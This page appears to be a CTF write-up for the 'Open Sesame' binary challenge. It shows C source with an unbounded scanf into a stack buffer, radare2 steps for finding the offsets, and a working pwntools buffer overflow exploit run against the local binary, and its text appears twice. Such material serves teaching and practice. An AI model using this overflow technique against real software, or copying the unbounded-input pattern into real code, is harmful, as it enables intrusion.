Open Sesame

#define SECRET_PASS "OpenSesame!!!"

Bool isPasswordCorrect(char *input)
{
    return (strncmp(input, SECRET_PASS, strlen(SECRET_PASS)) == 0) ? yes : no;
}

void caveOfGold()
{
    Bool caveCanOpen = no;
    char inputPass[256];

    puts("BEHOLD THE CAVE OF GOLD\n");

    puts("What is the magic enchantment that opens the mouth of the cave?");
    flushBuffers();

    scanf("%s", inputPass);

# The binary is vulnerable to a Stack-Based Buffer Overflow attack - it is a x64 bit ELF executable with NX enabled.
i~nx,pie,endian,rel
endian   little
nx       true
relocs   true
relro    partial
# We can generate a cyclic pattern with ragg2 -P 300 -r to cause a segment error

dc
BEHOLD THE CAVE OF GOLD

What is the magic enchantment that opens the mouth of the cave?
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB
ERROR, INCORRECT PASSWORD!
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0

# If we run wopO `dr rbp` we can find the offset to the base pointer
> wopO `dr rbp`
272
# We know that OpenSesame!!! is the password so we can subtract the length of it by the offset of the RBP to get 259 - that means we need 259 bits of padding AFTER supplying the password -> ('OpenSesame!!!'+b"A"*259)

# Next, we need to get the offset of the stack pointer using wopO
> pxw @ rsp
0x7fffffffde08  0x41684241 0x42416942 0x6b42416a 0x416c4241  ABhABiABjABkABlA
[...]
> wopO 0x41684241
280
# So we need 8 more characters added after our padding
('OpenSesame!!!'+b"A"*259+b"B"*8)

# Let's make our exploit script

#!/usr/bin/env python3
# print("OpenSesame!!!" + "A"*259 + "B"*8)

from pwn import *

payload = b"OpenSesame!!!"
payload += b"A"*259
payload += b"B"*8

p = process("./open_sesame")

p.clean()
p.sendline(payload)
log.info(p.clean())

python3 exploit.py
[+] Starting local process './open_sesame': pid 10635
/home/lavender/.local/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] YOU HAVE PROVEN YOURSELF WORTHY HERE IS THE GOLD:
[*] Stopped process './open_sesame' (pid 10635)

# You can make a flag file to test this

PreviousBinary Exploitation NextIris CTF

Last updated 1 year ago

Was this helpful?

#define SECRET_PASS "OpenSesame!!!" Bool isPasswordCorrect(char *input) { return (strncmp(input, SECRET_PASS, strlen(SECRET_PASS)) == 0) ? yes : no; } void caveOfGold() { Bool caveCanOpen = no; char inputPass[256]; puts("BEHOLD THE CAVE OF GOLD\n"); puts("What is the magic enchantment that opens the mouth of the cave?"); flushBuffers(); scanf("%s", inputPass); # The binary is vulnerable to a Stack-Based Buffer Overflow attack - it is a x64 bit ELF executable with NX enabled. i~nx,pie,endian,rel endian little nx true relocs true relro partial # We can generate a cyclic pattern with ragg2 -P 300 -r to cause a segment error dc BEHOLD THE CAVE OF GOLD What is the magic enchantment that opens the mouth of the cave? AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB ERROR, INCORRECT PASSWORD! [+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0 # If we run wopO `dr rbp` we can find the offset to the base pointer > wopO `dr rbp` 272 # We know that OpenSesame!!! is the password so we can subtract the length of it by the offset of the RBP to get 259 - that means we need 259 bits of padding AFTER supplying the password -> ('OpenSesame!!!'+b"A"*259) # Next, we need to get the offset of the stack pointer using wopO > pxw @ rsp 0x7fffffffde08 0x41684241 0x42416942 0x6b42416a 0x416c4241 ABhABiABjABkABlA [...] > wopO 0x41684241 280 # So we need 8 more characters added after our padding ('OpenSesame!!!'+b"A"*259+b"B"*8) # Let's make our exploit script

#!/usr/bin/env python3 # print("OpenSesame!!!" + "A"*259 + "B"*8) from pwn import * payload = b"OpenSesame!!!" payload += b"A"*259 payload += b"B"*8 p = process("./open_sesame") p.clean() p.sendline(payload) log.info(p.clean())

python3 exploit.py [+] Starting local process './open_sesame': pid 10635 /home/lavender/.local/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes self._log(logging.INFO, message, args, kwargs, 'info') [*] YOU HAVE PROVEN YOURSELF WORTHY HERE IS THE GOLD: [*] Stopped process './open_sesame' (pid 10635) # You can make a flag file to test this